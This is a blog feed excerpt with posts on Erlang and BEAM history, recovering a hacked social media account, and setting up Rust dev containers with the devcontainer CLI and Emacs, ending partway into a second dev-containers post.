&lt;p&gt;Before going into the next era of Erlang&#39;s development, I like to highlight two significant chapters in my journey that predates this period: my involvement with Scala at EPFL (École Polytechnique Fédérale de Lausanne) from 2003 to 2004 and at Virtutech 2004 to 2005. This experience, while seemingly a detour from Erlang, it broadened my perspective on programming languages and virtual machines.&lt;/p&gt;
&lt;p&gt;In 2003, I joined EPFL as a project manager for Scala, a language that was then in its nascent stages of development. Scala, designed to be a scalable and efficient language, aims to bridge the gap between object-oriented and functional programming paradigms. My role in this project was not just administrative; it was an opportunity to think about language design. It also gave me experience in the management of a complex software project.&lt;/p&gt;
&lt;p&gt;One of the most interesting aspects of Scala was its functional programming characteristics, some of which were inspired by Erlang. Erlang’s approach to concurrency, fault tolerance, and distributed computing offered valuable lessons relevant to Scala&#39;s development. My experience with Erlang provided me with insights that I could bring to the Scala project. It was a chance to see how concepts from Erlang could be adapted and applied in a different context and to a language with a distinct set of goals and design principles.&lt;/p&gt;
&lt;p&gt;My tenure at EPFL was a period of rich learning and cross-pollination of ideas. It was like being at a junction where the roads of Erlang and Scala intersected, allowing for an exchange of ideas that enriched both my understanding and the development of Scala. This experience underscored the value of exploring diverse programming paradigms and the importance of functional
programming in modern software development.&lt;/p&gt;
&lt;p&gt;Following my role in the Scala project at EPFL, I transitioned to Virtutech in 2004, working on virtual machine technology. At Virtutech, I worked on Simics, a high-performance virtual platform that simulates the hardware of different computer systems. Simics was a powerful tool for developers, allowing them to mimic the behavior of complex systems and test software in a controlled environment.&lt;/p&gt;
&lt;p&gt;My focus at Virtutech was on the performance optimization of Simics. This task involved deep dives into the intricacies of system architecture and the challenges of accurately simulating hardware behavior at high speeds. The experience honed my skills in understanding and improving system performance, a crucial aspect of virtual machine technology and the Erlang runtime system.&lt;/p&gt;
&lt;p&gt;Working on Simics gave me a unique perspective on the significance of performance in virtual systems. It was akin to fine-tuning a high-performance engine, where every adjustment and enhancement could significantly improve how the system operated. This knowledge proved invaluable in my subsequent endeavors with Erlang and BEAM.&lt;/p&gt;
&lt;p&gt;These experiences at EPFL and Virtutech shaped my approach to system design and optimization. They underscored the importance of a holistic understanding of software and hardware in creating efficient and robust systems. As I returned to the world of Erlang, the skills and insights gained from these roles enriched my contributions to the Erlang community, particularly in system performance and optimization.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/lausanne.JPG&quot; alt=&quot;A view from my appartment in Lausanne.&quot; title=&quot;A view from my appartment in Lausanne.&quot; /&gt;
&lt;h2 id=&quot;erlangs-stabilization-era-consolidation-over-innovation&quot; tabindex=&quot;-1&quot;&gt;Erlang&#39;s Stabilization Era: Consolidation Over Innovation&lt;/h2&gt;
&lt;p&gt;The period between 2006 and 2014 was when the focus noticeably shifted from innovation to stabilization. This era was marked by a concerted effort to make BEAM more stable and efficient, an endeavor that, while crucial, came at the cost of slowing down on the innovation front.&lt;/p&gt;
&lt;p&gt;During this time, the OTP (Open Telecom Platform) team, operating under the age-old adage of &amp;quot;the golden rule&amp;quot; - that is, &#39;whoever has the gold makes the rules&#39; - followed a path largely dictated by Ericsson&#39;s immediate needs. Ericsson, having become heavily dependent on Erlang for its revenue-generating projects, preferred a conservative approach. Their goal was clear: ensure the smooth running of existing systems and avoid any disruptions that might arise from overly ambitious innovations. It&#39;s a bit like being at a rock concert where the band decides to play only ballads; necessary for a breather, but you do miss the high-energy numbers.&lt;/p&gt;
&lt;p&gt;In this environment, much of the OTP team&#39;s work centered around enhancing the efficiency and stability of the Beam. This included the introduction of the multi-core version, which now
could deliver true parallelism. Something that most Erlang programs could take advantage of
immidately and automatically withou rewriting a single line of application code.&lt;/p&gt;
&lt;p&gt;Several enhancements to ETS (Erlang Term Storage) tables, and other performance optimizations
were also introduced. However, this shift also meant dialing back on some of the experimental features that HiPE had introduced. Features like hybrid heaps, parameterized modules, namespaces, and the just-in-time aspects of the HiPE compiler and loader were gradually removed to simplify maintenance.&lt;/p&gt;
&lt;p&gt;Eventually, this would lead to the complete phasing out of HiPE a number of years later, when it was replaced by a simpler JIT compiler in 2020, bringing the native code story back full circle. It was a bit like saying goodbye to a favorite experimental band that had once headlined festivals but was now playing in small clubs. While its contributions were significant and propelled BEAM forward, the need for a stable, easily maintainable system took precedence in the strategic decisions of the OTP team.&lt;/p&gt;
&lt;p&gt;This phase in Erlang&#39;s history highlights a common trajectory in technology development where, after a period of rapid innovation and experimentation, a consolidation phase is necessary. It underscores the balancing act between pushing the boundaries of innovation and ensuring the reliability and stability of technology, especially when it forms the backbone of infrastructure like telecommunications.&lt;/p&gt;
&lt;h2 id=&quot;klarna-challenging-and-enhancing-erlangs-limits&quot; tabindex=&quot;-1&quot;&gt;Klarna: Challenging and Enhancing Erlang&#39;s Limits&lt;/h2&gt;
&lt;p&gt;During this Stabilization Era, my professional journey found me at Klarna, where I was deeply involved in working with Erlang&#39;s runtime system. At Klarna, we were not just passive observers of the developments in the Erlang community; instead, we were actively pushing the Erlang Runtime System (ERTS) to its limits. This period was marked by a rigorous process of identifying, understanding, and resolving various challenges within ERTS, contributing to its overall stability and efficiency.&lt;/p&gt;
&lt;p&gt;I have written more about the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna era and the projects we worked on&lt;/a&gt; in a separate series.&lt;/p&gt;
&lt;p&gt;One of the notable challenges we encountered at Klarna was the limitation of process memory in ERTS, even on 64-bit systems. We discovered that a single Erlang process could not hold more than 32 GB of data, a constraint that posed significant challenges given the scale at which we were operating. This finding was crucial as it highlighted a fundamental limitation in the system, prompting us to dig deeper into Erlang&#39;s memory management mechanisms.&lt;/p&gt;
&lt;p&gt;Another issue we observed was related to the behavior of the schedulers. In some instances, the schedulers in ERTS could become a bit too eager to enter a sleep state, which, while efficient in some contexts, could lead to performance bottlenecks under certain workloads. Addressing this required a careful rebalancing of the scheduler&#39;s responsiveness, ensuring that they remained alert enough to handle fluctuating demands efficiently.&lt;/p&gt;
&lt;p&gt;Additionally, we tackled challenges with long-running built-in functions (BIFs). These functions could occasionally block the schedulers for extended periods. In extreme cases, this could trigger the HEART mechanism, Erlang&#39;s watchdog, to erroneously conclude that the system was unresponsive and initiate a restart. Such scenarios were not just theoretical concerns but real issues that we needed to address to maintain the reliability of our systems.&lt;/p&gt;
&lt;p&gt;We also grappled with issues related to memory usage, particularly concerning large binaries. References to these large binaries could get inadvertently &#39;stuck&#39; in processes, leading to substantial, and often unnecessary, memory consumption. This was a subtle yet significant issue, as it could lead to gradual memory bloat, impacting the system&#39;s overall performance and stability.&lt;/p&gt;
&lt;p&gt;One interesting system limitation resulted in our systems consistently crashing after a code upgrade. Yes, we did hot code loading of new releases at that time. The only hint on what was going wrong was a printout directly to the terminal of a sad face &amp;quot;:(&amp;quot;. This did not end up in any logs, so we first had to try to reproduce the error locally before we could see it. After some searching in the code, we found out that the system printed the sad face and exited if the hard-coded size of the number of exception handlers was exceeded. The developer of that code had very graciously left a comment: &amp;quot;This should probably be dynamically allocated.&amp;quot;&lt;/p&gt;
&lt;p&gt;My time at Klarna during this era was not just about addressing these challenges; it was also about contributing to the broader Erlang ecosystem. The issues we identified and the solutions we developed helped in enhancing the robustness of ERTS. It was a period that underscored the importance of real-world applications in revealing the limitations of a system and the collaborative nature of problem-solving in the open-source community. The experience at Klarna was like being in a high-stakes game where every discovery and improvement not only benefitted us but I think also enriched the entire Erlang community.&lt;/p&gt;
&lt;h2 id=&quot;elixirs-emergence-invigorating-the-erlang-ecosystem&quot; tabindex=&quot;-1&quot;&gt;Elixir&#39;s Emergence: Invigorating the Erlang Ecosystem&lt;/h2&gt;
&lt;p&gt;The emergence of Elixir in 2011 marked a new chapter in the story of Erlang. Created by José Valim, Elixir is a dynamic, functional language built on the Erlang VM (BEAM) and designed for building scalable and maintainable applications with an initial focus on web technologies. Elixir’s arrival had a profound impact on the Erlang community, infusing it with fresh energy and attracting a new wave of developers.&lt;/p&gt;
&lt;p&gt;Elixir managed to bridge a gap in the backend development community. Its modern syntax and tooling, combined with the robustness of the Erlang VM, made it appealing to a broader audience, including those who might have found Erlang&#39;s syntax and conventions challenging. This influx of new talent and ideas brought about a rejuvenation in the community, sparking renewed interest and innovative approaches to solving backend problems.&lt;/p&gt;
&lt;p&gt;From my perspective, Elixir&#39;s contribution to the Erlang ecosystem is akin to a revitalizing rain shower over a fertile field. It not only nourished the existing landscape but also encouraged new growth, diversifying and enriching the ecosystem. The presence of Elixir helped in popularizing some of Erlang&#39;s core principles, such as concurrency and fault tolerance, to a wider audience, thereby reinforcing the relevance of these ideas in modern software development.&lt;/p&gt;
&lt;h2 id=&quot;the-beam-book-chronicle-of-a-virtual-machine&quot; tabindex=&quot;-1&quot;&gt;The BEAM Book: Chronicle of a Virtual Machine&lt;/h2&gt;
&lt;p&gt;Following the emergence of Elixir and the energizing effect it had on the Erlang community, I started writing &amp;quot;The BEAM Book.&amp;quot; This project is a comprehensive documentation of the BEAM virtual machine, designed to provide an in-depth look into its inner workings, principles, and capabilities.&lt;/p&gt;
&lt;p&gt;The BEAM Book is an effort to encapsulate the rich history and technical intricacies of BEAM. I have written about &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_beam_book_lessons/&quot;&gt;the lessons from writing it&lt;/a&gt; and &lt;a href=&quot;https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/&quot;&gt;why I wrote it&lt;/a&gt; in later posts. It&#39;s intended to serve as both a historical record and a technical guide, offering insights into the design decisions, architectural nuances, and the operational mechanics of BEAM.&lt;/p&gt;
&lt;p&gt;My work on this book is driven by a desire to share knowledge and insights gathered over years of working closely with Erlang and BEAM. It&#39;s meant to be a resource for those who want to understand the depths of BEAM&#39;s capabilities, for developers who build systems on it, and for enthusiasts who wish to explore the underpinnings of this powerful virtual machine.&lt;/p&gt;
&lt;p&gt;The BEAM Book project is also a reflection of my commitment to the Erlang and Elixir communities. It&#39;s a way of giving back, of contributing to the collective knowledge base that has been so instrumental in the growth and success of these technologies. This endeavor is like charting the course of a great river - capturing its origins, its meandering journey, and the many ways it has enriched the lands through which it flows.&lt;/p&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;My nearly 30 years in this field have been a testament to the dynamic, ever-evolving nature of software development, where each new discovery builds upon the last.&lt;/p&gt;
&lt;p&gt;I encourage you, the readers, to reflect on your own experiences with Erlang, BEAM, or Elixir. Consider how these technologies have influenced your professional path and how you have interacted with these communities. Whether your role has been that of a developer, a scholar, or an enthusiast, your experiences and contributions are valuable chapters in this ongoing story. It is through our collective efforts and shared knowledge that these technologies continue to thrive and evolve, underpinning some of the most innovative and robust systems in the world today.&lt;/p&gt;
&lt;p&gt;I realize that each experience, each challenge, and each triumph has not only shaped my understanding of this technology but has also prepared me for my next endeavor. I am excited to announce that I will be building upon this history in my upcoming talk titled &amp;quot;30 Years On and In the Beam: Mastering Concurrency.&amp;quot; In this presentation, I plan to cover some technical aspects of BEAM, exploring some of its peculiarities and offering insights into designing effective concurrent systems.&lt;/p&gt;
&lt;p&gt;This talk is an opportunity to share knowledge, engage with new ideas, and continue learning from the community that has been a big part of this journey. I invite you to join me in this discussion, where we can learn more about concurret programming and explore the BEAM together.&lt;/p&gt;
&lt;p&gt;For more details and to register for the event, please visit  &lt;a href=&quot;https://codebeamamerica.com/keynotes/30-years-on-and-in-the-beam/&quot;&gt;30 Years On and In the Beam. Mastering Concurrency&lt;/a&gt;. I look forward to the opportunity to connect, share, and learn together. Hope to see you there!&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/GoldenGate.JPG&quot; alt=&quot;A view of the Goalde Gate Bridge in fog from one of my earlier visits to Erlang Factory in SF.&quot; title=&quot;A view of the Goalde Gate Bridge in fog from one of my earlier visits to Erlang Factory in SF.&quot; /&gt;</content>
  </entry>
  
  <entry>
    <title>Recovering from a Hacked Social Media Account</title>
    <link href="https://happihacking.com/blog/posts/2023/hacked/"/>
    <updated>2023-10-17T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/hacked/</id>
    <summary>A Quick Guide</summary>
    <content type="html">&lt;p&gt;If you&#39;ve observed unusual activity on your account or can&#39;t access it, you&#39;re not the only one. Let&#39;s go through the steps to regain control.&lt;/p&gt;
&lt;p&gt;When you first suspect unauthorized access to your account, resetting your password as soon as possible is essential. Most platforms, including Facebook and Instagram, have a straightforward process on their login pages to help you do this, usually requiring your registered email or phone number. After regaining access, you should review your activity log to identify and rectify any unfamiliar actions. Additionally, consider logging out of all sessions on other devices and turning on two-factor authentication for added security. This feature enhances security by sending a verification code to your phone during login.&lt;/p&gt;
&lt;p&gt;Several platforms offer dedicated pages to guide users through the recovery process:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Google&lt;/strong&gt;: &lt;a href=&quot;https://support.google.com/accounts/answer/6294825?hl=en&quot;&gt;Recovery Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Facebook&lt;/strong&gt;: &lt;a href=&quot;https://www.facebook.com/help/105487009541643&quot;&gt;Recovery Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Instagram&lt;/strong&gt;: &lt;a href=&quot;https://www.instagram.com/hacked/&quot;&gt;Recovery Link&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Maintaining the security of your accounts is an ongoing process. One practical approach is to use tools such as LastPass or 1Password. These tools not only store passwords securely but can also generate strong combinations tailored for each account. Moreover, monitoring the devices and locations accessing your account is prudent. Regularly monitoring this can alert you to any unauthorized access attempts. Lastly, teach yourself about the latest hacking techniques and potential threats. Position yourself to protect your account by staying informed.&lt;/p&gt;
&lt;p&gt;At HappiHacking, our expertise lies in software optimization and organizational growth. Yet, we recognize the paramount importance of online security in today&#39;s connected world. We have therefore written a guide on what to do if you get hacked &lt;a href=&quot;https://happihacking.com/hacked/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Dev Containers Part 2: Setup, the devcontainer CLI &amp; Emacs</title>
    <link href="https://happihacking.com/blog/posts/2023/dev-containers-emacs/"/>
    <updated>2023-08-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/dev-containers-emacs/</id>
    <summary>Bring Your Emacs Friends to the Party</summary>
    <content type="html">&lt;p&gt;In the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers/&quot;&gt;previous
post&lt;/a&gt;, we
could read about how to use dev containers to streamline your developer
workflow, and the benefits of containerizing, well, everything.&lt;/p&gt;
&lt;p&gt;In this post I will walk you through my process of getting a
containerized development environment for a small Rust project up and
running using the &lt;code&gt;devcontainer&lt;/code&gt; CLI. I will also show how to access
this enviroment using Emacs.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/gnu3.jpeg&quot; alt=&quot;A GNU in a container&quot; title=&quot;A GNU in a container&quot; /&gt;
&lt;p&gt;But first, a quick recap.&lt;/p&gt;
&lt;h2 id=&quot;what-is-a-dev-container&quot; tabindex=&quot;-1&quot;&gt;What is a Dev Container?&lt;/h2&gt;
&lt;p&gt;I&#39;m assuming some familiarity with docker and containerization here.&lt;/p&gt;
&lt;p&gt;A dev container is in its simplest form a docker container with
two important modifications:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Your workspace/source code folder is shared between the containers
file system and your host file system, such that any changes made
to the files inside the container persists should the container
stop or restart.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;While a classic container generally has a single &lt;code&gt;CMD&lt;/code&gt; instruction,
that for example runs the relevant application, a dev container
instead simply starts and does nothing, thus allowing you to
connect to it and start hacking away.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;project-setup&quot; tabindex=&quot;-1&quot;&gt;Project Setup&lt;/h2&gt;
&lt;p&gt;To follow along, you will require &lt;a href=&quot;https://www.docker.com/&quot;&gt;Docker&lt;/a&gt;, and the &lt;a href=&quot;https://github.com/devcontainers/cli&quot;&gt;devcontainer CLI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As mentioned, this will be a Rust project, and we will thus be using
&lt;a href=&quot;https://doc.rust-lang.org/cargo/&quot;&gt;Cargo&lt;/a&gt;, the Rust package manager,
to set it up. Though, in the spirit of containerization, we will do
it from inside the container, meaning we will not need to have it
installed on our host machine.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;We&#39;ll create a project folder and initialize a rust project with cargo:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir rust-dev-container &amp;amp;&amp;amp; cd rust-dev-container
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Inside our project folder, we create another folder named
&lt;code&gt;.devcontainer&lt;/code&gt;, and two files inside that folder:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir .devcontainer &amp;amp;&amp;amp; touch .devcontainer/Dockerfile &amp;amp;&amp;amp; touch .devcontainer/devcontainer.json

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;Dockerfile&lt;/code&gt; will specify our development environment, and the
&lt;code&gt;devcontainer.json&lt;/code&gt; file will simply refer to the dockerfile.&lt;/p&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;Fill the &lt;code&gt;Dockerfile&lt;/code&gt; with the following content:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-docker&quot;&gt;FROM mcr.microsoft.com/devcontainers/rust:0-1-bullseye

# Add rust-analyzer download and setup
RUN curl -L https://github.com/rust-lang/rust-analyzer/releases/download/2023-08-07/rust-analyzer-aarch64-unknown-linux-gnu.gz -o /usr/bin/rust-analyzer.gz
RUN gzip -d /usr/bin/rust-analyzer.gz
RUN chmod +x /usr/bin/rust-analyzer
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We will use a rust docker image from Microsoft, and add the
&lt;code&gt;rust-analyzer&lt;/code&gt; language server, which we will need to get
IntelliSense features in Emacs.&lt;/p&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Fill the &lt;code&gt;devcontainer.json&lt;/code&gt; file with the following content:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;name&amp;quot;: &amp;quot;Rust Dev Container&amp;quot;,
    &amp;quot;build&amp;quot; : {
      &amp;quot;dockerfile&amp;quot; : &amp;quot;Dockerfile&amp;quot;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As mentioned, we simply reference the &lt;code&gt;Dockerfile&lt;/code&gt;.&lt;/p&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Now, assuming docker is running, and the devcontainer CLI is
available, we simply run the following command from our workspace folder:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;devcontainer up --workspace-folder .
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will spin up the container, which means that we are basically
done. From this point we can connect to our container and start
developing.&lt;/p&gt;
&lt;ol start=&quot;6&quot;&gt;
&lt;li&gt;As a last step, we will initialize the project from inside the
container by running the following command:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;devcontainer exec --workspace-folder . cargo init
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will run &lt;code&gt;cargo init&lt;/code&gt; inside our workspace folder inside the
container. Since this folder is connected to the folder you are
currently in, you can do a simple &lt;code&gt;ls&lt;/code&gt; and see the changes on your
host machine.&lt;/p&gt;
&lt;p&gt;And we are done!&lt;/p&gt;
&lt;p&gt;This is basically all there is to setting up a dev container. In the
next section we will connect to the container through Emacs and Tramp.&lt;/p&gt;
&lt;h2 id=&quot;emacs-tramp&quot; tabindex=&quot;-1&quot;&gt;Emacs &amp;amp; Tramp&lt;/h2&gt;
&lt;p&gt;Working inside a container works exactly like working on a remote
machine, which works almost identically to working on your own
machine. The Emacs module which allows this is called &lt;a href=&quot;https://www.gnu.org/software/tramp/&quot;&gt;Tramp&lt;/a&gt; You simply prefix the the file you want to open with
&lt;code&gt;/docker:&amp;lt;CONTAINER ID&amp;gt;:&lt;/code&gt;. To find your container ID, you can run
&lt;code&gt;docker ps&lt;/code&gt; in a terminal. Inside the container, the workspace folder
is located at &lt;code&gt;/workspaces/&lt;/code&gt;. In our case, I&#39;d do &lt;code&gt;M-x find-file&lt;/code&gt; and
then enter:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;/docker:7cdf905ea9e8:/workspaces/rust-dev-container/src/main.rs
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then simply start writing code.&lt;/p&gt;
&lt;p&gt;NOTE: This is true for Emacs 29
and later. For earlier versions, you need &lt;a href=&quot;https://github.com/emacs-pe/docker-tramp.el&quot;&gt;this
package&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To get IntelliSense features, I use &lt;code&gt;eglot&lt;/code&gt; (which comes with Emacs
from version 29), an LSP client, and &lt;code&gt;rustic&lt;/code&gt;, a rust mode.  Eglot
automatically finds the &lt;code&gt;rust-analyzer&lt;/code&gt; binary that we specified in
the docker file. To get &lt;code&gt;rustic&lt;/code&gt; to work properly I had to tell it
where to find the &lt;code&gt;cargo&lt;/code&gt; binary inside the container.&lt;/p&gt;
&lt;p&gt;This is how I have configured those packages (using &lt;a href=&quot;https://jwiegley.github.io/use-package/&quot;&gt;use-package&lt;/a&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elisp&quot;&gt;(use-package eglot
  :config
  (setq eglot-events-buffer-size 0
        eglot-ignored-server-capabilities &#39;(:inlayHintProvider)
        eglot-confirm-server-initiated-edits nil))

(use-package rustic
  :config
  ; Tell rustic where to find the cargo binary
  (setq rustic-cargo-bin-remote &amp;quot;/usr/local/cargo/bin/cargo&amp;quot;)
  (setq rustic-lsp-client &#39;eglot))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is how the containerized project looks from my Emacs frame:&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/emacs_dev_container.png&quot; alt=&quot;Containerized project in Emacs&quot; title=&quot;Containerized project in Emacs&quot; /&gt;
&lt;p&gt;My full Emacs configuration can be found &lt;a href=&quot;https://github.com/maxperea/emacs-conf/&quot;&gt;here&lt;/a&gt;.
It is heavily inspired by &lt;a href=&quot;https://github.com/doomemacs/doomemacs&quot;&gt;Doom Emacs&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Dev containers are a great way to streamline the setup of your
development environment, and you can even invite your Emacs using
friends to the party.&lt;/p&gt;
&lt;p&gt;Thanks for reading, and good luck with your projects!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Dev Containers: Consistency in Development</title>
    <link href="https://happihacking.com/blog/posts/2023/dev-containers/"/>
    <updated>2023-07-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/dev-containers/</id>
    <summary>Finding Freedom in Confinement</summary>
    <content type="html">&lt;h2 id=&quot;dev-containers-turtles-all-the-way-down&quot; tabindex=&quot;-1&quot;&gt;Dev Containers: Turtles all the way down&lt;/h2&gt;
&lt;p&gt;Dev Containers might just be the key to streamlining your development workflow. These tools provide a consistent, isolated, and reproducible development environment. No more &amp;quot;but it works on my machine&amp;quot; excuses. With dev containers, if it works on one machine, it works on all.&lt;/p&gt;
&lt;p&gt;In this article, we&#39;ll explore what dev containers are, their benefits, and how to set one up. We&#39;ll delve into the nuts and bolts of creating and configuring your own dev container, and by the end, you&#39;ll be equipped with the knowledge to bring your development environment into the 21st century.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/lego_turtle_crop.jpg&quot; alt=&quot;A Lego turtle.&quot; title=&quot;A Lego turtle.&quot; /&gt;
&lt;p&gt;If you&#39;ve ever heard the phrase &amp;quot;It&#39;s turtles all the way down&amp;quot;, you&#39;ll find it surprisingly relevant here. Especially if you&#39;re working on Windows in WSL2 or on a Mac where the dev environments are usually Linux-based, much like the live environment. But more on that later.&lt;/p&gt;
&lt;p&gt;Back in the early 2000s, I was part of a team working on Simics, a cycle-accurate full system simulator. Simics was a game-changer in the world of software development. It introduced the ability to run programs backwards, a feature that was nothing short of revolutionary. This meant that developers could step back through their code execution, making it easier to identify and fix bugs.&lt;/p&gt;
&lt;p&gt;But that&#39;s not all. Simics also made it possible to simulate hardware that didn&#39;t even exist yet. This was a significant breakthrough, as it allowed software development to proceed in parallel with hardware development.&lt;/p&gt;
&lt;p&gt;For instance, Microsoft was able to develop a 64-bit version of Windows before the 64-bit hardware was even available. This was a significant advantage, as it allowed Microsoft to hit the ground running when the hardware was finally released.&lt;/p&gt;
&lt;p&gt;IBM also leveraged Simics to develop a 64-bit version of their operating system OS/2. This parallel development of hardware and software was a significant shift in the industry, and it was all made possible by Simics.&lt;/p&gt;
&lt;p&gt;Around the same time, VMWare and VirtualBox was also making waves in the world of virtualization. VirtualBox allowed developers to run multiple operating systems on a single machine, which was a significant step forward in terms of flexibility and efficiency.&lt;/p&gt;
&lt;p&gt;VMware&#39;s technology was revolutionary at the time. It allowed businesses to partition a physical server into multiple virtual machines, each capable of running its own operating system and applications. This meant that businesses could get more value from their physical servers, reducing costs and improving efficiency.&lt;/p&gt;
&lt;p&gt;These tools, Simics, VMware, and VirtualBox, were the precursors to the easy virtualization we enjoy today with Docker. They laid the groundwork for what we now know as dev containers, and their influence can still be seen in the way we develop software today.&lt;/p&gt;
&lt;p&gt;Before we get into the how of running dev containers, let&#39;s talk about the why. Why should you consider using dev containers? What makes them worth the effort of setting up? Well, let&#39;s find out.&lt;/p&gt;
&lt;p&gt;Here are the main benefits:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Consistency&lt;/strong&gt;: The &amp;quot;it works on my machine&amp;quot; syndrome is a developer&#39;s nightmare. Dev containers squash this issue. Everyone works with the same environment, eliminating the gap between local and production setups. Moreover, if done right this consistency extends to testing and live environments, ensuring that your application behaves as expected across all stages. At Happi Hacking we are experts in doing this right and we would be happy to help you set things up the right way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quick Setup&lt;/strong&gt;: Setting up a new project or jumping between projects can be time-consuming. With dev containers, you can get up and running in no time. No need to install and configure each dependency manually, the container has it all ready for you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Simplified Onboarding&lt;/strong&gt;: New team member? No problem. With dev containers, they can hit the ground running. Pull the container, start coding. It&#39;s that simple.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Collaboration&lt;/strong&gt;: Sharing your work environment is as simple as sharing your container configuration. This facilitates collaboration, whether you&#39;re pair programming or debugging.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dependency Management&lt;/strong&gt;: Dev containers keep your project and its dependencies in their own neat little box. This means no more conflicts between projects that require different versions of the same dependency.&lt;/p&gt;
&lt;h2 id=&quot;what-is-a-dev-container&quot; tabindex=&quot;-1&quot;&gt;What is a Dev Container?&lt;/h2&gt;
&lt;p&gt;A Dev Container, or Development Container, is a virtual environment tailored for software development. It&#39;s a self-contained unit that houses your project and all its dependencies. Think of it as a mini-computer, living inside your actual computer, that you can set up to match your project&#39;s needs exactly.&lt;/p&gt;
&lt;p&gt;Dev Containers work by leveraging containerization technology. If you&#39;re familiar with Docker, you&#39;re halfway there. Docker allows us to package an application along with its environment into a container. A Dev Container takes this a step further and packages not just the application, but the entire development environment.&lt;/p&gt;
&lt;p&gt;This means your Dev Container includes the specific version of the programming language you&#39;re using, any libraries or frameworks your project depends on, and even the development tools and extensions you need. Everything is pre-configured and ready to go.&lt;/p&gt;
&lt;p&gt;The beauty of this is that a Dev Container is portable. You can share it with your team, ensuring everyone is working in the same environment. You can run it on different machines, knowing it will behave the same way. You can even version control it, so you can go back to a previous setup if needed.&lt;/p&gt;
&lt;h2 id=&quot;creating-and-optimizing-your-dev-containers-a-practical-guide&quot; tabindex=&quot;-1&quot;&gt;Creating and Optimizing Your Dev Containers: A Practical Guide&lt;/h2&gt;
&lt;p&gt;Setting up a basic dev container is a straightforward process. You start by installing Docker on your machine.&lt;/p&gt;
&lt;h3 id=&quot;installing-docker-on-windows-wsl2&quot; tabindex=&quot;-1&quot;&gt;Installing Docker on Windows (WSL2):&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Install Windows Subsystem for Linux (WSL) and upgrade to WSL2. You can follow &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/wsl/install&quot;&gt;Microsoft&#39;s official guide to do this.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Download Docker Desktop for Windows from &lt;a href=&quot;https://docs.docker.com/desktop/install/windows-install/&quot;&gt;Docker&#39;s official website&lt;/a&gt; and install it. During installation, ensure that you select the option to use WSL2 instead of Hyper-V.&lt;/li&gt;
&lt;li&gt;After installation, Docker Desktop will automatically use WSL2.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id=&quot;installing-docker-on-mac&quot; tabindex=&quot;-1&quot;&gt;Installing Docker on Mac:&lt;/h3&gt;
&lt;ol&gt;
